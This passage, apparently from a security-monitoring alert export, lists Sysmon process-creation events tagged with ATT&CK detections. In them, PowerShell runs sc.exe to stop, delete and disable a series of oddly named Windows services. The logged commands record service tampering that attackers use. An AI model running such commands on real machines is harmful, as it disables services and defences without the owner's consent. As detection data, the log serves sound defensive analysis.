29, 2020 @ 14:18:02.588",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:34.306 +ProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010224a1900} +ProcessId: 3268 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config WinHelp32 Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config WinHelp32 Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:34.308360300Z"",""eventRecordID"":""2077"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:34.306\r\nProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010224a1900}\r\nProcessId: 3268\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config WinHelp32 Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:34.306"",""processGuid"":""{df9fc3d3-b35e-5ecf-0000-0010224a1900}"",""processId"":""3268"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config WinHelp32 Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:02.540",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:34.284 +ProcessGuid: {df9fc3d3-b35e-5ecf-0000-001090481900} +ProcessId: 3252 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationalwpi +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationalwpi",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:34.286567800Z"",""eventRecordID"":""2075"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:34.284\r\nProcessGuid: {df9fc3d3-b35e-5ecf-0000-001090481900}\r\nProcessId: 3252\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationalwpi\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:34.284"",""processGuid"":""{df9fc3d3-b35e-5ecf-0000-001090481900}"",""processId"":""3252"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationalwpi"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:02.494",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:34.250 +ProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010f7451900} +ProcessId: 7120 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationalaie +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationalaie",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:34.252163100Z"",""eventRecordID"":""2072"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:34.250\r\nProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010f7451900}\r\nProcessId: 7120\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationalaie\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:34.250"",""processGuid"":""{df9fc3d3-b35e-5ecf-0000-0010f7451900}"",""processId"":""7120"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationalaie"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:02.462",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:34.220 +ProcessGuid: {df9fc3d3-b35e-5ecf-0000-001067441900} +ProcessId: 5940 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete Nationalmll +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete Nationalmll",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:34.222830200Z"",""eventRecordID"":""2070"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:34.220\r\nProcessGuid: {df9fc3d3-b35e-5ecf-0000-001067441900}\r\nProcessId: 5940\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete Nationalmll\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:34.220"",""processGuid"":""{df9fc3d3-b35e-5ecf-0000-001067441900}"",""processId"":""5940"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete Nationalmll"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:02.448",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:34.204 +ProcessGuid: {df9fc3d3-b35e-5ecf-0000-001096431900} +ProcessId: 4188 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationalmll +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationalmll",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:34.207389700Z"",""eventRecordID"":""2069"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:34.204\r\nProcessGuid: {df9fc3d3-b35e-5ecf-0000-001096431900}\r\nProcessId: 4188\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationalmll\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:34.204"",""processGuid"":""{df9fc3d3-b35e-5ecf-0000-001096431900}"",""processId"":""4188"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationalmll"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:02.383",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:34.156 +ProcessGuid: {df9fc3d3-b35e-5ecf-0000-00100c411900} +ProcessId: 1104 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationaloll +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationaloll",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:34.158411100Z"",""eventRecordID"":""2066"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:34.156\r\nProcessGuid: {df9fc3d3-b35e-5ecf-0000-00100c411900}\r\nProcessId: 1104\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationaloll\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:34.156"",""processGuid"":""{df9fc3d3-b35e-5ecf-0000-00100c411900}"",""processId"":""1104"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationaloll"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:02.337",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:34.114 +ProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010813e1900} +ProcessId: 1700 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Natimmonal +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: 